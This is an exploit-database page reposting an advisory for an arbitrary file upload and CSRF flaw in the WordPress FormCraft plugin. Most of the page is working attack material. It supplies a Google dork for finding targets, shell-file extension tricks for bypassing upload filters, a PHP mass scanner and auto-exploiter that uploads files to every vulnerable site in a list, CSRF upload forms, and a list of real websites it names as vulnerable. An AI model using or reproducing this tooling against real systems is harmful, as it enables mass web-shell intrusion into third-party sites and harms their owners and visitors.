Advertisement






WordPress 5.0.4 FormCraft Plugins 2.0 CSRF Backdoor Access Vulnerability

CVE Category Price Severity
CVE-2019-14211 CWE-352 $1500 High
Author Risk Exploitation Type Date
CyberSecurityPulse Critical Remote 2019-03-18
CVSS EPSS EPSSP
Not specified 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019030144

Below is a copy:

WordPress 5.0.4 FormCraft Plugins 2.0 CSRF Backdoor Access Vulnerability
############################################################################################

# Exploit Title : WordPress 5.0.4 FormCraft Plugins 2.0 CSRF Backdoor Access Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/03/2019
# Vendor Homepages : formcraft-wp.com ~ ncrafts.net ~ formcrafts.com
# Software Download Links : formcrafts.com/formcrafts-form-builder.zip
downloads.wordpress.org/plugin/formcraft-form-builder.zip
# Software Information Links : wordpress.org/plugins/formcraft-form-builder/
wpexplorer.com/formcraft-drag-drop-form-builder-wordpress-plugin/
codecanyon.net/item/formcraft-premium-wordpress-form-builder/5335056
formcrafts.com/integrations/wordpress
formcraft-wp.com/addons/stripe/
# Software Affected Version : 1.2.0 - 1.2.1 - 1.2.3 / 2.0 and All Versions 
Compatible with WordPress [ Vulnerable WP Versions ] => 
3.6 - 4.2.2 - 4.2.7 -  4.5 - 4.9.9 - 4.9.1 - 5.0.x -  5.0.4 
# Software Price Type : Free / Paid Download / 36$
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/formcraft/''
# Vulnerability Type : 
CWE-352 [ Cross-Site Request Forgery (CSRF) ]
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
CWE-264 [ Permissions, Privileges, and Access Controls ]
# JVN : jvn.jp/en/jp/JVN83501605/index.html
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Cyberizm Exploit Reference Link :
cyberizm.org/cyberizm-wordpress-formcraft-auto-php-csrf-exploiter.html

############################################################################################

# Description about Software :
***************************
FormCraft is a drag-and-drop form builder to create and embed forms, and track submissions for WordPress.

############################################################################################

# Impact :
***********
* The software allows the attacker to upload or transfer files of dangerous types that can be automatically processed within 

the product's environment. * Weaknesses in this category are related to the management of permissions, privileges, and

other security features that are used to perform access control. * This software has Cross Site Request Forgery Vulnerability 

because the web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally 

provided by the user who submitted the request. 

* The vulnerability CSRF allows a remote attacker to perform cross-site request forgery attacks.

The vulnerability exists due to insufficient validation of the HTTP request origin. A remote attacker can trick the victim to visit a 

specially crafted web page and perform arbitrary actions on behalf of the victim on the vulnerable website, such as generat 

new forms, insert JavaScript code to existing forms, and delete existing forms.

* WordPress FormCraft Plugins 2.0 and 1.2.3 and other versions is prone to a 

vulnerability that lets attackers upload arbitrary files because the application fails to properly verify user-supplied input. 

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. 

This may facilitate unauthorized access or privilege escalation; other attacks are also possible. WordPress 5.0.4 

FormCraft 2.0 and 1.2.3 is vulnerable; prior versions may also be affected.

############################################################################################

Installation =>
*************
Extract the download package to a temporary location.
Zip the folder formcraft
Log in to WordPress and click on the Add New option under Plugins.
Click on the Upload link.
Click on Choose File and browse the zipped file formcraft and click on Install.
Now activate the plugin
If you are facing trouble with the file upload field, you need to set the permissions of the directory 
/wp-content/plugins/formcraft/file-upload/server/ and sub directories, and files to 755

############################################################################################

# CSRF / PHP / Arbitrary File Upload / File Insertion Exploit :
*****************************************************
Vulnerability =>
************** 
/wp-content/plugins/formcraft/file-upload/server/php/upload.php

/wp-content/plugins/formcraft/file-upload/server/content/upload.php

Vulnerability Error => 
*********************
{"failed":"No file found 2"}

Directory File Path :
*******************
/wp-content/plugins/formcraft/file-upload/server/php/files/.....

/wp-content/plugins/formcraft/file-upload/server/content/files/....

/wp-content/plugins/formcraft/file-upload/server/php/files/[RANDOM-NUMBERS-WORDS]yourshellname.php

Note : yourfilename.html .txt .gif .png .gif - Try to upload your shell files extensions like this =>  

SH3LL.php.pjpg -  SH3LL.php;.gif   - SH3LL.asp:,fla  - SH3LL.phtml - SH3LL.php5 - SH3LL.php  -  

Sh3LL.asp;.jpeg  - Sh3LL.php;.gif ;.jpeg - Sh3LL.php;.swf ;.flv  - Sh3LL.php;.pjpg ;.jpeg and etcetra.....

Try on your Computer LocalHost.

Note 2 :  If sites says like this " {"failed":"Not writable"} " The vulnerability has been fixed.

###########################################################################################

PHP Auto Exploitation Tool => 
***************************
<?php
print"
Cyberizm WordPress FormCraft Scanner + Auto Exploiter
Mr. KingSkrupellos - Cyberizm Digital Security Team
";
error_reporting(0);
set_time_limit(0);

if(!file_exists($argv[1])){
  die('
File Not Found
usage: php formcraft.php sites.txt

');
}
$file=@fopen('shell.phtml','a+');

$get=file_get_contents($argv[1]);
$ex=explode("\n",$get);
$c=file($argv[1]);
echo"Total target : ".count($c)."\n\n";

foreach($c as $sites){
  echo "scanning site : $sites";
   $sites=trim($sites);

     $urlex='/wp-content/plugins/formcraft/file-upload/server/php/upload.php';
     $url1=($sites).($urlex) ;
     $get1=@file_get_contents($url1);
    if(eregi('{"files":',$get1)){
    echo"[!] HAHAHA VULNERABILITY FOUND :* [!]\n";
       
$kingskrupellos = "loader.php";    // loader.php = <?php phpinfo();
                                        // plz readme
$ewe = array("files[]"=>"@$kingskrupellos");
$ch = curl_init("$sites/wp-content/plugins/formcraft/file-upload/server/php/");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $ewe);
$data = curl_exec ($ch);
curl_close ($ch);
echo "[+]Exploited: $data\n\n";
fwrite($file,"<a href="."$sites/wp-content/plugins/formcraft/file-upload/server/php/files/$kingskrupellos"." target="."_blank".">$sites/wp-content/plugins/formcraft/file-upload/server/php/files/$kingskrupellos"."</a><br>");
}else{
    echo"NOT VULN\n\n";
    }
    }
print "
shell saved in shell.phtml
";
?>

###########################################################################################

CSRF Cross Site Request Forgery Exploiter 1 => 
******************************************
<form method="POST" action="VULNERABLEWEBSITEHERE/wp-content/plugins/formcraft/file-upload/server/php/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

-------------------------------------------------------------------------------------------------------------------------------------------------------------

CSRF Cross Site Request Forgery Exploiter 2 => 
******************************************
<form method="POST" action="VULNERABLEWEBSITEHERE/wp-content/plugins/formcraft/file-upload/server/content/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

############################################################################################

# Example Vulnerable Sites :
*************************
[+] lerika.eu/wp-content/plugins/formcraft/file-upload/server/content/upload.php

[+] hdil.in/wp-content/plugins/formcraft/file-upload/server/content/upload.php

[+] navigatefinancial.com.au/wp-content/plugins/formcraft/file-upload/server/content/upload.php

[+] giien.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php

[+] nvtint.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php

[+] histoiresdegroupes.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php

[+] radiobelavista.com.br/site/wp-content/plugins/formcraft/file-upload/server/content/upload.php

[+] fattyweng.com.sg/wp-content/plugins/formcraft/file-upload/server/content/upload.php

[+] bilagroup.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php

[+] mclvt.org/wp-content/plugins/formcraft/file-upload/server/content/upload.php

[+] mylittlehomecr.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php

[+] skuplaptop.pl/wp-content/plugins/formcraft/file-upload/server/content/upload.php

############################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

############################################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.